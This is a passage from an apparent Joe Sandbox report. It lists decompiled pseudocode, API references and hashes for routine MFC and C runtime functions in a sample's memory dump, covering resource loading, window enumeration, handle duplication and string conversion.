                                                      				_v8 = _t18;
                                                      				if(_t18 == 0) {
                                                      					goto L10;
                                                      				}
                                                      				_t28 = LockResource(_t18);
                                                      				goto L4;
                                                      			}

                                                      APIs
                                                      • FindResourceA.KERNEL32(?,?,000000F0), ref: 00406C55
                                                      • LoadResource.KERNEL32(?,00000000), ref: 00406C61
                                                      • LockResource.KERNEL32(00000000), ref: 00406C6F
                                                      • FreeResource.KERNEL32(00000000), ref: 00406C9D
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.613869877.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000003.00000002.613854761.0000000000400000.00000002.00020000.sdmp
                                                      • Associated: 00000003.00000002.613975412.0000000000434000.00000002.00020000.sdmp
                                                      • Associated: 00000003.00000002.614010074.0000000000442000.00000004.00020000.sdmp
                                                      • Associated: 00000003.00000002.614021943.0000000000446000.00000004.00020000.sdmp
                                                      • Associated: 00000003.00000002.614037174.0000000000449000.00000002.00020000.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_dot3hc.jbxd
                                                      Similarity
                                                      • API ID: Resource$FindFreeLoadLock
                                                      • String ID:
                                                      • API String ID: 1078018258-0
                                                      • Opcode ID: 725bdaf51e1b943991e5373a74aa2e6cad060cb5622a81dcc914f303c66514db
                                                      • Instruction ID: 11cc8024c2f07788693a5cf3b80dfacf3a4c7265796ede5ebdbe0383e22cf367
                                                      • Opcode Fuzzy Hash: 725bdaf51e1b943991e5373a74aa2e6cad060cb5622a81dcc914f303c66514db
                                                      • Instruction Fuzzy Hash: 2B112871600209EFDB108FA6D848A9B7BB9FF44355F05807AF946A7291CB78A910CB64
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 53%
                                                      			E00415364(void* __edi, void* __esi, void* __eflags, intOrPtr _a4, RECT* _a8, int _a12) {
                                                      				intOrPtr _v8;
                                                      				char _v12;
                                                      				struct tagRECT _v28;
                                                      				intOrPtr _t35;
                                                      
                                                      				_t35 = _a4;
                                                      				E0040DBE0( &_v12, __eflags,  *((intOrPtr*)(_t35 - 0xb0)));
                                                      				if(_a8 != 0) {
                                                      					IntersectRect( &_v28, _a8, _t35 - 0x9c);
                                                      					EqualRect( &_v28, _a8);
                                                      				} else {
                                                      					asm("movsd");
                                                      					asm("movsd");
                                                      					asm("movsd");
                                                      					asm("movsd");
                                                      				}
                                                      				if(IsRectEmpty( &_v28) == 0) {
                                                      					InvalidateRect( *( *((intOrPtr*)( *((intOrPtr*)(_t35 - 0xac)) + 0x20)) + 0x20),  &_v28, _a12);
                                                      				}
                                                      				if(_v8 != 0) {
                                                      					_push(_v12);
                                                      					_push(0);
                                                      					E0040D3B7();
                                                      				}
                                                      				return 0;
                                                      			}








                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.613869877.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000003.00000002.613854761.0000000000400000.00000002.00020000.sdmp
                                                      • Associated: 00000003.00000002.613975412.0000000000434000.00000002.00020000.sdmp
                                                      • Associated: 00000003.00000002.614010074.0000000000442000.00000004.00020000.sdmp
                                                      • Associated: 00000003.00000002.614021943.0000000000446000.00000004.00020000.sdmp
                                                      • Associated: 00000003.00000002.614037174.0000000000449000.00000002.00020000.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_dot3hc.jbxd
                                                      Similarity
                                                      • API ID: Rect$EmptyEqualIntersectInvalidate
                                                      • String ID:
                                                      • API String ID: 3354205298-0
                                                      • Opcode ID: cd773583f8eec6913ba4177664b886877b1c38ce39c4077a6852081b8256b7b2
                                                      • Instruction ID: 695aae43ea9637a98273fc7b87fa48ff0bcdc9407a5be2b6daed2edba48ecd02
                                                      • Opcode Fuzzy Hash: cd773583f8eec6913ba4177664b886877b1c38ce39c4077a6852081b8256b7b2
                                                      • Instruction Fuzzy Hash: 8711187690020EEBCF01DF94D889FDEBBB9FF44309F004062FA04AB111D375AA959BA4
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 93%
                                                      			E00410317(void* __ecx, void* __eflags) {
                                                      				void* _v8;
                                                      				void* __ebx;
                                                      				void* __edi;
                                                      				void* __esi;
                                                      				void* __ebp;
                                                      				void* _t9;
                                                      				void* _t11;
                                                      				int _t13;
                                                      				void* _t23;
                                                      				intOrPtr* _t30;
                                                      				void* _t32;
                                                      				void* _t34;
                                                      				void* _t35;
                                                      
                                                      				_push(__ecx);
                                                      				_t23 = __ecx;
                                                      				_t9 = E00402EE1(__eflags, 0x10);
                                                      				_t37 = _t9;
                                                      				if(_t9 == 0) {
                                                      					_t30 = 0;
                                                      					__eflags = 0;
                                                      				} else {
                                                      					_t30 = E004102FA(_t9, _t37);
                                                      				}
                                                      				_t11 = GetCurrentProcess();
                                                      				_t13 = DuplicateHandle(GetCurrentProcess(),  *(_t23 + 4), _t11,  &_v8, 0, 0, 2);
                                                      				_t34 = _t32;
                                                      				if(_t13 == 0) {
                                                      					if(_t30 != 0) {
                                                      						 *((intOrPtr*)( *_t30 + 4))(1);
                                                      					}
                                                      					E0041B0C1(_t23, _t30, _t34, _t35, GetLastError(),  *((intOrPtr*)(_t23 + 0xc)));
                                                      				}
                                                      				 *((intOrPtr*)(_t30 + 4)) = _v8;
                                                      				 *((intOrPtr*)(_t30 + 8)) =  *((intOrPtr*)(_t23 + 8));
                                                      				return _t30;
                                                      			}

















                                                      APIs
                                                        • Part of subcall function 00402EE1: _malloc.LIBCMT ref: 00402EFB
                                                      • GetCurrentProcess.KERNEL32(?,00000000,00000000,00000002), ref: 00410349
                                                      • GetCurrentProcess.KERNEL32(?,00000000), ref: 0041034F
                                                      • DuplicateHandle.KERNEL32(00000000), ref: 00410352
                                                      • GetLastError.KERNEL32(?), ref: 0041036D
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.613869877.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000003.00000002.613854761.0000000000400000.00000002.00020000.sdmp
                                                      • Associated: 00000003.00000002.613975412.0000000000434000.00000002.00020000.sdmp
                                                      • Associated: 00000003.00000002.614010074.0000000000442000.00000004.00020000.sdmp
                                                      • Associated: 00000003.00000002.614021943.0000000000446000.00000004.00020000.sdmp
                                                      • Associated: 00000003.00000002.614037174.0000000000449000.00000002.00020000.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_dot3hc.jbxd
                                                      Similarity
                                                      • API ID: CurrentProcess$DuplicateErrorHandleLast_malloc
                                                      • String ID:
                                                      • API String ID: 3704204646-0
                                                      • Opcode ID: 127a2b6425212ae10ae3fc16ac81f62d75707bc7e267825681550bdd9f0b7852
                                                      • Instruction ID: 3b195a4d90feac135872a4ffd9d4d720c51410c6d11ff7f0ee39d7a6200223b5
                                                      • Opcode Fuzzy Hash: 127a2b6425212ae10ae3fc16ac81f62d75707bc7e267825681550bdd9f0b7852
                                                      • Instruction Fuzzy Hash: 7C018471700204AFDB109BA6CD89F9B7BA8DF84750F144466FD05CB281DBB5EC809BA4
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 91%
                                                      			E00404952(void* __ecx, void* __edi, void* __ebp, signed int _a4) {
                                                      				void* __ebx;
                                                      				void* __esi;
                                                      				void* _t16;
                                                      				int _t17;
                                                      				int _t18;
                                                      				struct HWND__* _t19;
                                                      				intOrPtr _t25;
                                                      				intOrPtr _t33;
                                                      				void* _t35;
                                                      
                                                      				_t32 = __edi;
                                                      				_t35 = __ecx;
                                                      				_t25 =  *((intOrPtr*)(__ecx + 0xc));
                                                      				if(_t25 == 0) {
                                                      					__eflags =  *((intOrPtr*)(__ecx + 0x14));
                                                      					if(__eflags == 0) {
                                                      						L3:
                                                      						_t17 = E004037E3(0, _t25, _t32, _t35, _t39);
                                                      						L4:
                                                      						asm("sbb edx, edx");
                                                      						_t18 = EnableMenuItem( *(_t25 + 4), _t17, ( ~_a4 & 0xfffffffd) + 0x00000003 | 0x00000400);
                                                      						L11:
                                                      						 *((intOrPtr*)(_t35 + 0x18)) = 1;
                                                      						return _t18;
                                                      					}
                                                      					__eflags = _a4;
                                                      					if(_a4 == 0) {
                                                      						_push(__edi);
                                                      						_t33 =  *((intOrPtr*)(__ecx + 0x14));
                                                      						_t19 = GetFocus();
                                                      						__eflags = _t19 -  *(_t33 + 0x20);
                                                      						if(_t19 ==  *(_t33 + 0x20)) {
                                                      							SendMessageA( *(E00409C97(0, _t25, __ebp, GetParent( *(_t33 + 0x20))) + 0x20), 0x28, 0, 0);
                                                      						}
                                                      					}
                                                      					_t18 = E0040CA8B( *((intOrPtr*)(_t35 + 0x14)), _a4);
                                                      					goto L11;
                                                      				}
                                                      				if( *((intOrPtr*)(__ecx + 0x10)) == 0) {
                                                      					_t17 =  *(__ecx + 8);
                                                      					_t39 = _t17 -  *((intOrPtr*)(__ecx + 0x20));
                                                      					if(_t17 <  *((intOrPtr*)(__ecx + 0x20))) {
                                                      						goto L4;
                                                      					}
                                                      					goto L3;
                                                      				}
                                                      				return _t16;
                                                      			}













                                                      APIs
                                                      • EnableMenuItem.USER32 ref: 0040498A
                                                        • Part of subcall function 004037E3: __CxxThrowException@8.LIBCMT ref: 004037F7
                                                        • Part of subcall function 004037E3: __EH_prolog3.LIBCMT ref: 00403804
                                                      • GetFocus.USER32 ref: 004049A1
                                                      • GetParent.USER32(?), ref: 004049AF
                                                      • SendMessageA.USER32(?,00000028,00000000,00000000), ref: 004049C2
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.613869877.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000003.00000002.613854761.0000000000400000.00000002.00020000.sdmp
                                                      • Associated: 00000003.00000002.613975412.0000000000434000.00000002.00020000.sdmp
                                                      • Associated: 00000003.00000002.614010074.0000000000442000.00000004.00020000.sdmp
                                                      • Associated: 00000003.00000002.614021943.0000000000446000.00000004.00020000.sdmp
                                                      • Associated: 00000003.00000002.614037174.0000000000449000.00000002.00020000.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_dot3hc.jbxd
                                                      Similarity
                                                      • API ID: EnableException@8FocusH_prolog3ItemMenuMessageParentSendThrow
                                                      • String ID:
                                                      • API String ID: 3849708097-0
                                                      • Opcode ID: e72bafc065e83abc75d2031577df1877b7e0563ed678ea765f6496426475fe74
                                                      • Instruction ID: 914c255c74ae2b2e161b517f63bea8142904b75b6db113dff41908d8fcf81d8c
                                                      • Opcode Fuzzy Hash: e72bafc065e83abc75d2031577df1877b7e0563ed678ea765f6496426475fe74
                                                      • Instruction Fuzzy Hash: F5113CF1100600AFDB209F60DC85A6BB7B5FBD4326B10C63EF286625A0C734AC45CB69
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 77%
                                                      			E0040A5C3(void* __ebx, void* __ecx, struct HWND__* _a4, int _a8, int _a12, long _a16, struct HWND__* _a20, struct HWND__* _a24) {
                                                      				void* __edi;
                                                      				void* __esi;
                                                      				void* __ebp;
                                                      				struct HWND__* _t16;
                                                      				struct HWND__* _t18;
                                                      				struct HWND__* _t20;
                                                      				void* _t22;
                                                      				void* _t23;
                                                      				void* _t24;
                                                      				struct HWND__* _t25;
                                                      
                                                      				_t23 = __ecx;
                                                      				_t22 = __ebx;
                                                      				_t24 = GetTopWindow;
                                                      				_t16 = GetTopWindow(_a4);
                                                      				while(1) {
                                                      					_t25 = _t16;
                                                      					if(_t25 == 0) {
                                                      						break;
                                                      					}
                                                      					__eflags = _a24;
                                                      					if(__eflags == 0) {
                                                      						SendMessageA(_t25, _a8, _a12, _a16);
                                                      					} else {
                                                      						_t20 = E00409CBE(_t23, _t24, _t25, __eflags, _t25);
                                                      						__eflags = _t20;
                                                      						if(__eflags != 0) {
                                                      							_push(_a16);
                                                      							_push(_a12);
                                                      							_push(_a8);
                                                      							_push( *((intOrPtr*)(_t20 + 0x20)));
                                                      							_push(_t20);
                                                      							E0040A2E8(_t22, _t24, _t25, __eflags);
                                                      						}
                                                      					}
                                                      					__eflags = _a20;
                                                      					if(_a20 != 0) {
                                                      						_t18 = GetTopWindow(_t25);
                                                      						__eflags = _t18;
                                                      						if(_t18 != 0) {
                                                      							E0040A5C3(_t22, _t23, _t25, _a8, _a12, _a16, _a20, _a24);
                                                      						}
                                                      					}
                                                      					_t16 = GetWindow(_t25, 2);
                                                      				}
                                                      				return _t16;
                                                      			}














                                                      APIs
                                                      • GetTopWindow.USER32(00000000), ref: 0040A5D1
                                                      • GetTopWindow.USER32(00000000), ref: 0040A610
                                                      • GetWindow.USER32(00000000,00000002), ref: 0040A62E
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.613869877.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000003.00000002.613854761.0000000000400000.00000002.00020000.sdmp
                                                      • Associated: 00000003.00000002.613975412.0000000000434000.00000002.00020000.sdmp
                                                      • Associated: 00000003.00000002.614010074.0000000000442000.00000004.00020000.sdmp
                                                      • Associated: 00000003.00000002.614021943.0000000000446000.00000004.00020000.sdmp
                                                      • Associated: 00000003.00000002.614037174.0000000000449000.00000002.00020000.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_dot3hc.jbxd
                                                      Similarity
                                                      • API ID: Window
                                                      • String ID:
                                                      • API String ID: 2353593579-0
                                                      • Opcode ID: 5fdfce87b7b707005e05352e841891f402f616d7f1fe5be37b2960e84f9d87ac
                                                      • Instruction ID: 6bb7837223b1437e7f35f4f841dbeb3d150c6d8cc2c7bce5033a1c3b76c9a84e
                                                      • Opcode Fuzzy Hash: 5fdfce87b7b707005e05352e841891f402f616d7f1fe5be37b2960e84f9d87ac
                                                      • Instruction Fuzzy Hash: AC01ED3600161ABBCF126F559C04EDF3B36FF48350F054426F940651A1D73AC972EBAA
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 50%
                                                      			E0040EC5F(short* _a4) {
                                                      				char* _v0;
                                                      				int _v8;
                                                      				int _v16;
                                                      				void* __ebx;
                                                      				void* __ecx;
                                                      				void* __edi;
                                                      				void* __esi;
                                                      				void* __ebp;
                                                      				int _t6;
                                                      				char* _t7;
                                                      				void* _t12;
                                                      				char* _t13;
                                                      				void* _t15;
                                                      				void* _t16;
                                                      				short* _t20;
                                                      
                                                      				_t20 = _a4;
                                                      				if(_t20 != 0) {
                                                      					__imp__#7(_t20, _t16, _t12);
                                                      					_v8 = _t6;
                                                      					_t7 = WideCharToMultiByte(0, 0, _t20, _t6, 0, 0, 0, 0);
                                                      					_v0 = _t7;
                                                      					__imp__#150(0, _t7);
                                                      					_t13 = _t7;
                                                      					__eflags = _t13;
                                                      					if(__eflags == 0) {
                                                      						E004037AF(_t13, _t15, WideCharToMultiByte, 0, __eflags);
                                                      					}
                                                      					WideCharToMultiByte(0, 0, _t20, _v16, _t13, _v8, 0, 0);
                                                      					return _t13;
                                                      				}
                                                      				return 0;
                                                      			}



















                                                      APIs
                                                      • SysStringLen.OLEAUT32(?), ref: 0040EC73
                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,?,?,0000000C,0041BC26,00000000,00000018,0041BF6C), ref: 0040EC8B
                                                      • SysAllocStringByteLen.OLEAUT32(00000000,00000000), ref: 0040EC93
                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,?,00000000,00000000,?,?,0000000C,0041BC26,00000000,00000018,0041BF6C), ref: 0040ECB2
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.613869877.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000003.00000002.613854761.0000000000400000.00000002.00020000.sdmp
                                                      • Associated: 00000003.00000002.613975412.0000000000434000.00000002.00020000.sdmp
                                                      • Associated: 00000003.00000002.614010074.0000000000442000.00000004.00020000.sdmp
                                                      • Associated: 00000003.00000002.614021943.0000000000446000.00000004.00020000.sdmp
                                                      • Associated: 00000003.00000002.614037174.0000000000449000.00000002.00020000.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_dot3hc.jbxd
                                                      Similarity
                                                      • API ID: Byte$CharMultiStringWide$Alloc
                                                      • String ID:
                                                      • API String ID: 3384502665-0
                                                      • Opcode ID: d53530b6845a85bbb5eb6b3b7f3747d219b095aaba301d680609f69000207b61
                                                      • Instruction ID: a8860d5d0e509bcf303a4908704158829630dd5dfdd3e8d3169bb9f7432348a3
                                                      • Opcode Fuzzy Hash: d53530b6845a85bbb5eb6b3b7f3747d219b095aaba301d680609f69000207b61
                                                      • Instruction Fuzzy Hash: 47F012761062287F93211BA79C4CCABBF9CFE9A3E5B10093AF549A2150D6799810C6F5
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 100%
                                                      			E0042AC64(void* __ebx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28) {
                                                      				intOrPtr _t25;
                                                      				void* _t26;
                                                      				void* _t28;
                                                      				void* _t29;
                                                      
                                                      				_t28 = __ebx;
                                                      				_t25 = _a16;
                                                      				if(_t25 == 0x65 || _t25 == 0x45) {
                                                      					_t26 = E0042A561(_t29, __eflags, _a4, _a8, _a12, _a20, _a24, _a28);
                                                      					goto L9;
                                                      				} else {
                                                      					_t35 = _t25 - 0x66;
                                                      					if(_t25 != 0x66) {
                                                      						__eflags = _t25 - 0x61;
                                                      						if(_t25 == 0x61) {
                                                      							L7:
                                                      							_t26 = E0042A64D(_t28, _t29, _a4, _a8, _a12, _a20, _a24, _a28);
                                                      						} else {
                                                      							__eflags = _t25 - 0x41;
                                                      							if(__eflags == 0) {
                                                      								goto L7;
                                                      							} else {
                                                      								_t26 = E0042AB6C(_t29, __eflags, _a4, _a8, _a12, _a20, _a24, _a28);
                                                      							}
                                                      						}
                                                      						L9:
                                                      						return _t26;
                                                      					} else {
                                                      						return E0042AAB3(_t29, _t35, _a4, _a8, _a12, _a20, _a28);
                                                      					}
                                                      				}
                                                      			}








                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.613869877.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000003.00000002.613854761.0000000000400000.00000002.00020000.sdmp
                                                      • Associated: 00000003.00000002.613975412.0000000000434000.00000002.00020000.sdmp
                                                      • Associated: 00000003.00000002.614010074.0000000000442000.00000004.00020000.sdmp
                                                      • Associated: 00000003.00000002.614021943.0000000000446000.00000004.00020000.sdmp
                                                      • Associated: 00000003.00000002.614037174.0000000000449000.00000002.00020000.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_dot3hc.jbxd
                                                      Similarity
                                                      • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                      • String ID:
                                                      • API String ID: 3016257755-0
                                                      • Opcode ID: 7ea3a893bf3bd11cad7cd0372379ff1f7e327c259811a7a92178e9d3a0fb71f7
                                                      • Instruction ID: 3dbc08a52ec38b7d7a761f0fe1270b82bedc95c96d3fe4623e25e7259ca750c8
                                                      • Opcode Fuzzy Hash: 7ea3a893bf3bd11cad7cd0372379ff1f7e327c259811a7a92178e9d3a0fb71f7
                                                      • Instruction Fuzzy Hash: 8B017B3250015EBBCF125F85ED018EE3F22BF19344B888416FE1959130D23BC9B1EB8A
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 96%
                                                      			E00409F82(void* __ebx, void* __ecx, struct HWND__* _a4, int _a8, intOrPtr _a12) {
                                                      				void* __edi;
                                                      				void* __esi;
                                                      				void* __ebp;
                                                      				struct HWND__* _t9;
                                                      				struct HWND__* _t10;
                                                      				void* _t14;
                                                      				void* _t15;
                                                      				struct HWND__* _t16;
                                                      				struct HWND__* _t17;
                                                      				void* _t18;
                                                      
                                                      				_t14 = __ecx;
                                                      				_t13 = __ebx;
                                                      				_t9 = GetDlgItem(_a4, _a8);
                                                      				_t15 = GetTopWindow;
                                                      				_t16 = _t9;
                                                      				if(_t16 == 0) {
                                                      					L6:
                                                      					_t10 = GetTopWindow(_a4);
                                                      					while(1) {
                                                      						_t17 = _t10;
                                                      						__eflags = _t17;
                                                      						if(_t17 == 0) {
                                                      							goto L10;
                                                      						}
                                                      						_t10 = E00409F82(_t13, _t14, _t17, _a8, _a12);
                                                      						__eflags = _t10;
                                                      						if(_t10 == 0) {
                                                      							_t10 = GetWindow(_t17, 2);
                                                      							continue;
                                                      						}
                                                      						goto L10;
                                                      					}
                                                      				} else {
                                                      					if(GetTopWindow(_t16) == 0) {
                                                      						L3:
                                                      						_push(_t16);
                                                      						if(_a12 == 0) {
                                                      							return E00409C97(_t13, _t14, _t18);
                                                      						}
                                                      						_t10 = E00409CBE(_t14, _t15, _t16, __eflags);
                                                      						__eflags = _t10;
                                                      						if(_t10 == 0) {
                                                      							goto L6;
                                                      						}
                                                      					} else {
                                                      						_t10 = E00409F82(__ebx, _t14, _t16, _a8, _a12);
                                                      						if(_t10 == 0) {
                                                      							goto L3;
                                                      						}
                                                      					}
                                                      				}
                                                      				L10:
                                                      				return _t10;
                                                      			}














                                                      APIs
                                                      • GetDlgItem.USER32 ref: 00409F8D
                                                      • GetTopWindow.USER32(00000000), ref: 00409FA0
                                                        • Part of subcall function 00409F82: GetWindow.USER32(00000000,00000002), ref: 00409FE7
                                                      • GetTopWindow.USER32(?), ref: 00409FD0
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.613869877.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000003.00000002.613854761.0000000000400000.00000002.00020000.sdmp
                                                      • Associated: 00000003.00000002.613975412.0000000000434000.00000002.00020000.sdmp
                                                      • Associated: 00000003.00000002.614010074.0000000000442000.00000004.00020000.sdmp
                                                      • Associated: 00000003.00000002.614021943.0000000000446000.00000004.00020000.sdmp
                                                      • Associated: 00000003.00000002.614037174.0000000000449000.00000002.00020000.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_dot3hc.jbxd
                                                      Similarity
                                                      • API ID: Window$Item
                                                      • String ID:
                                                      • API String ID: 369458955-0
                                                      • Opcode ID: 6b3d63afe5932d7f4a6ca00e44b07854abff9deeab6878bfa63d6e411355adcf
                                                      • Instruction ID: f6ea6eabe51ed2d5a48b12d105cf3c13206c2d8bb6ceeb41934ac94127644c0a
                                                      • Opcode Fuzzy Hash: 6b3d63afe5932d7f4a6ca00e44b07854abff9deeab6878bfa63d6e411355adcf
                                                      • Instruction Fuzzy Hash: 89018F32505617B7CB222F519C00EDF3A58AF807E0F054036FD00F6292D739DD11A6A9
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 89%
                                                      			E0042526C(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                                                      				signed int _t15;
                                                      				LONG* _t21;
                                                      				long _t23;
                                                      				void* _t31;
                                                      				LONG* _t33;
                                                      				void* _t34;
                                                      				void* _t35;
                                                      
                                                      				_t35 = __eflags;
                                                      				_t29 = __edx;
                                                      				_t25 = __ebx;
                                                      				_push(0xc);
                                                      				_push(0x43f810);
                                                      				E00421418(__ebx, __edi, __esi);
                                                      				_t31 = E0042485D(__edx, __edi, _t35);
                                                      				_t15 =  *0x443df4; // 0xfffffffe
                                                      				if(( *(_t31 + 0x70) & _t15) == 0 ||  *((intOrPtr*)(_t31 + 0x6c)) == 0) {
                                                      					E00422E2D(0xd);
                                                      					 *(_t34 - 4) =  *(_t34 - 4) & 0x00000000;
                                                      					_t33 =  *(_t31 + 0x68);
                                                      					 *(_t34 - 0x1c) = _t33;
                                                      					__eflags = _t33 -  *0x443cf8; // 0x2241320
                                                      					if(__eflags != 0) {
                                                      						__eflags = _t33;
                                                      						if(_t33 != 0) {
                                                      							_t23 = InterlockedDecrement(_t33);
                                                      							__eflags = _t23;
                                                      							if(_t23 == 0) {
                                                      								__eflags = _t33 - 0x4438d0;
                                                      								if(__eflags != 0) {
                                                      									_push(_t33);
                                                      									E0041E18A(_t25, _t31, _t33, __eflags);
                                                      								}
                                                      							}
                                                      						}
                                                      						_t21 =  *0x443cf8; // 0x2241320
                                                      						 *(_t31 + 0x68) = _t21;
                                                      						_t33 =  *0x443cf8; // 0x2241320
                                                      						 *(_t34 - 0x1c) = _t33;
                                                      						InterlockedIncrement(_t33);
                                                      					}
                                                      					 *(_t34 - 4) = 0xfffffffe;
                                                      					E00425307();
                                                      				} else {
                                                      					_t33 =  *(_t31 + 0x68);
                                                      				}
                                                      				if(_t33 == 0) {
                                                      					E0041F916(_t25, _t29, _t31, 0x20);
                                                      				}
                                                      				return E0042145D(_t33);
                                                      			}











                                                      APIs
                                                        • Part of subcall function 0042485D: __getptd_noexit.LIBCMT ref: 0042485E
                                                        • Part of subcall function 0042485D: __amsg_exit.LIBCMT ref: 0042486B
                                                      • __amsg_exit.LIBCMT ref: 00425298
                                                      • __lock.LIBCMT ref: 004252A8
                                                      • InterlockedDecrement.KERNEL32(?), ref: 004252C5
                                                      • InterlockedIncrement.KERNEL32(02241320), ref: 004252F0
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.613869877.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000003.00000002.613854761.0000000000400000.00000002.00020000.sdmp
                                                      • Associated: 00000003.00000002.613975412.0000000000434000.00000002.00020000.sdmp
                                                      • Associated: 00000003.00000002.614010074.0000000000442000.00000004.00020000.sdmp
                                                      • Associated: 00000003.00000002.614021943.0000000000446000.00000004.00020000.sdmp
                                                      • Associated: 00000003.00000002.614037174.0000000000449000.00000002.00020000.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_dot3hc.jbxd
                                                      Similarity
                                                      • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd_noexit__lock
                                                      • String ID:
                                                      • API String ID: 2880340415-0
                                                      • Opcode ID: b1b043d092f6a2a1616c32b40d31738fdcf655e9fae88bb2fc2316b540347ebb
                                                      • Instruction ID: 724aaa48ea21f26d78a4a53a77eade52139c7390ef92faafb76bd8af03b18e74
                                                      • Opcode Fuzzy Hash: b1b043d092f6a2a1616c32b40d31738fdcf655e9fae88bb2fc2316b540347ebb
                                                      • Instruction Fuzzy Hash: 50017032B01A32E7CB11AB55B80674A7360AB05715F51016BF814A73D0CB38A9818FED
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 100%
                                                      			E0040C865(void* __ecx, CHAR* _a4) {
                                                      				void* __ebx;
                                                      				void* __edi;
                                                      				void* __esi;
                                                      				void* __ebp;
                                                      				struct HRSRC__* _t8;
                                                      				void* _t9;
                                                      				void* _t11;
                                                      				void* _t14;
                                                      				void* _t15;
                                                      				void* _t16;
                                                      				struct HINSTANCE__* _t17;
                                                      				void* _t18;
                                                      
                                                      				_t14 = 0;
                                                      				_t11 = 0;
                                                      				_t19 = _a4;
                                                      				_t18 = __ecx;
                                                      				if(_a4 == 0) {
                                                      					L4:
                                                      					_t16 = E0040C41C(_t11, _t18, _t11);
                                                      					if(_t11 != 0 && _t14 != 0) {
                                                      						FreeResource(_t14);
                                                      					}
                                                      					return _t16;
                                                      				}
                                                      				_t17 =  *(E0040DB94(0, 0, _t15, _t19) + 0xc);
                                                      				_t8 = FindResourceA(_t17, _a4, 0xf0);
                                                      				if(_t8 == 0) {
                                                      					goto L4;
                                                      				}
                                                      				_t9 = LoadResource(_t17, _t8);
                                                      				_t14 = _t9;
                                                      				if(_t14 != 0) {
                                                      					_t11 = LockResource(_t14);
                                                      					goto L4;
                                                      				}
                                                      				return _t9;
                                                      			}
















                                                      APIs
                                                      • FindResourceA.KERNEL32(?,?,000000F0), ref: 0040C887
                                                      • LoadResource.KERNEL32(?,00000000,?,?,?,?,0040605B,?,?,00401E60,8FFEDB05), ref: 0040C893
                                                      • LockResource.KERNEL32(00000000,?,?,?,?,0040605B,?,?,00401E60,8FFEDB05), ref: 0040C8A0
                                                      • FreeResource.KERNEL32(00000000,00000000,?,?,?,?,0040605B,?,?,00401E60,8FFEDB05), ref: 0040C8BB
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.613869877.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000003.00000002.613854761.0000000000400000.00000002.00020000.sdmp
                                                      • Associated: 00000003.00000002.613975412.0000000000434000.00000002.00020000.sdmp
                                                      • Associated: 00000003.00000002.614010074.0000000000442000.00000004.00020000.sdmp
                                                      • Associated: 00000003.00000002.614021943.0000000000446000.00000004.00020000.sdmp
                                                      • Associated: 00000003.00000002.614037174.0000000000449000.00000002.00020000.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_dot3hc.jbxd
                                                      Similarity
                                                      • API ID: Resource$FindFreeLoadLock
                                                      • String ID:
                                                      • API String ID: 1078018258-0
                                                      • Opcode ID: 4b2985310e55d01a51c35c94c145e98cb6cf6508d3b3b950bf57967042e4943f
                                                      • Instruction ID: 1cc108b070ddcadaf49700f58f1fb47de74f4529278b4a49e0f23a097ff97351
                                                      • Opcode Fuzzy Hash: 4b2985310e55d01a51c35c94c145e98cb6cf6508d3b3b950bf57967042e4943f
